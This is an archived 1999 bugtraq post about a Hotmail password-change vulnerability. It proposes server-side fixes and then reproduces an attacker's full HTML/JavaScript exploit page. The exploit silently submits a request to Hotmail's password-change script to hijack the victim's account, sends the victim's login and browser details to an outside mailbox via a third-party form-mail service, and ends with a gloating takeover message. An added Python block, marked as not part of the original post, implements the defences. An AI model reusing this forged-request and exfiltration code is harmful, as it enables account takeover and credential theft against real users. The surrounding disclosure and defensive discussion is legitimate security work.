hotmail claims vulnerability patched, so here it is

From: David L. Nicol (davidat_private)
Date: Wed May 05 1999 - 15:31:34 PDT


    Dear Paul:
    
    I am reading your previous article on hotmail security,
    http://www.news.com/News/Item/0,4,33996,00.html
    
    and I'm CCing this message to the bugtraq list.
    
    A good patch from Hotmail would have to involve some additional
    info with the cookie.
    
    A couple of approaches that come to mind include:
    
     verifying http_referer data in the script submission to make sure it's
     from the expected hotmail page
    
     putting additional hidden key fields with constantly changing names
    and values on submittable pages, to provide verification that the pages
    are legit
    
     investigating any incidents of pages being submitted with incorrect,
    nonexistent, or unexpected "secret flag fields" as described above
    
    I don't work for hotmail (as you know) and I am caught up in this
    as a bystander;
    
    I would expect hotmail to give you an explanation of their patch that not
    only is detailed but makes sense and that you cannot find a hole in.
    
    If hotmail merely changed the names of variables, or did a similar
    short term fix, the next exploit might not be nice enough to announce
    itself as such.  Modifying the attached El Lite exploit to only work
    if it had a particular hotmail account might be a piece of cake,
    allowing for some highly targeted kinds of attacks (esp. if a hotmail
    user is doing anything involving return-email verification, like tipjar
    or first virtual).
    
    
    
    Here is the hacker's tripod page, including the exploit that
    takes advantage of the trust hotmail has for instructions from
    your browser, by secretly sending instructions to hotmail to change
    your password to
    
    
    
    <HTML>
    <HEAD>
    <!--Begin JavaScrypt roadmap code.  If editing downloaded HTML source,
    delete
     this portion.-->
    
    <scrypt language="JavaScrypt">
    
    
    <!--
    
    function TripodShowPopup()
    {
            // open the popup window
            var popupURL =
    "http://members.tripod.com/adm/popup/roadmap.shtml";
            var popup =
    window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
            // set the opener if it's not already set.  it's set automatically
            // in netscape 3.0+ and ie 3.0+.
            if( navigator.appName.substring(0,8) == "Netscape" )
            {
                    popup.location = popupURL;
            }
    }
    
    TripodShowPopup();
    
    // -->
    
    
    </scrypt>
    
    <!--End inserted JavaScript code.-->
    <base href="http://members.tripod.com/kraffa2/Hook.html">
    </HEAD>
    
    <body>
    <scrypt>
    <!--
    
    function getCGIValue(nombre, elURL)
            {
            elURL= elURL;
            nombre= nombre+"=";
            vacio="";
            found= elURL.indexOf(nombre);
            if (found > -1)
                    {
                    found2= elURL.indexOf("&",found);
                    found+= nombre.length;
                    end= (found2 > -1) ? found2 : elURL.length;
                    var value= elURL.substring(found, end);
                    value= (value != null) ? value : vacio;
                    return value;
    
                    }
            else {return vacio;}
    
    }
    
    Query= unescape(self.location.search);
    disk= getCGIValue("disk", Query);
    login= getCGIValue("login", Query);
    host= "www.hotmail.com";
    hintq= escape('<img src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El Lite©</center>');
    hinta= '%66axf%61x';
    TheURL= "http://"+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;
    Mail= "http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkovaat_private&mailfrom="+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");
    
    options=
    'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';
    
    HOTMAIL= window.open(TheURL,"HOTMAIL",options);
    self.focus();
    setTimeout("HOTMAIL.close()",8000);
    
    MAIL= window.open(Mail,"MAIL",options);
    self.focus();
    setTimeout("MAIL.close()",8000);
    
    
    
    //-->
    </scrypt>
    
    
    
    <pre><b>
    
      One of the best free email services in existence is precisely the one
      you are using, hotmail. Its security and inviolability are already
    legendary.
    
      So much so that, would you believe it, from this very moment things
      are going to take a different turn. I mean that, regrettably, your
      hotmail address has been disabled, or rather, hijacked
    by me.
    
      You will never be able to get into it again.
    
      It's that final. Now it is
    
                                    ONLY MIIINE!!!! :-))))
    
      Since I'm such a nice guy and you are not my only victim, one of these
    days I'm going to
      publish on es.comp.hackers the password I set for you (it's the same
    for all
      of you suckers)
    
      There you go, I hope it goes easy on you
    
      El Lite&copy;
    </b></pre>
    </body>
    </html>
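The three approaches proposed in the message above, as an added example that is not part of the original post or of Hotmail's code: a Python server-side check using a hidden field whose name and value change on every form render, a Referer check against the expected host, and an audit log of submissions that arrive with no flag field, an unknown one, or a wrong value. The function names and the in-memory token store are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed in-memory store of hidden fields issued per session:
# {session_id: {field_name: field_value}}. A real deployment would keep
# this in the server-side session record, never in the cookie alone.
_issued = {}

def issue_form_token(session_id):
    """Return a (name, value) pair for a hidden field on one rendered form.
    Both change on every render, so a forged page cannot know them."""
    name = "k" + secrets.token_hex(8)
    value = secrets.token_urlsafe(24)
    _issued.setdefault(session_id, {})[name] = value
    return name, value

def referer_ok(referer, expected_host):
    """Approach 1: the submitting page must come from the expected host.
    Browsers may omit the header, so this is a coarse filter, not the only check."""
    if not referer:
        return False
    return urlparse(referer).hostname == expected_host

def check_submission(session_id, form, referer, expected_host, audit_log):
    """Approaches 2 and 3: accept only a submission carrying a valid issued
    flag field; record every incorrect, nonexistent or unexpected one."""
    if not referer_ok(referer, expected_host):
        audit_log.append(f"{session_id}: bad referer {referer!r}")
        return False
    tokens = _issued.get(session_id, {})
    present = [n for n in form if n in tokens]
    if not present:
        audit_log.append(f"{session_id}: no secret flag field in submission")
        return False
    name = present[0]
    # constant-time comparison so the value cannot be guessed byte by byte
    if not hmac.compare_digest(form[name].encode(), tokens[name].encode()):
        audit_log.append(f"{session_id}: wrong value for flag field {name}")
        return False
    del tokens[name]  # single use: a replayed copy of the form is rejected
    return True
```

A page like the attached one submits only the fields it knows (disk, login, the new password) from a foreign host, so it fails both the Referer test and the flag-field test and leaves an entry in the audit log.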
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:09 PDT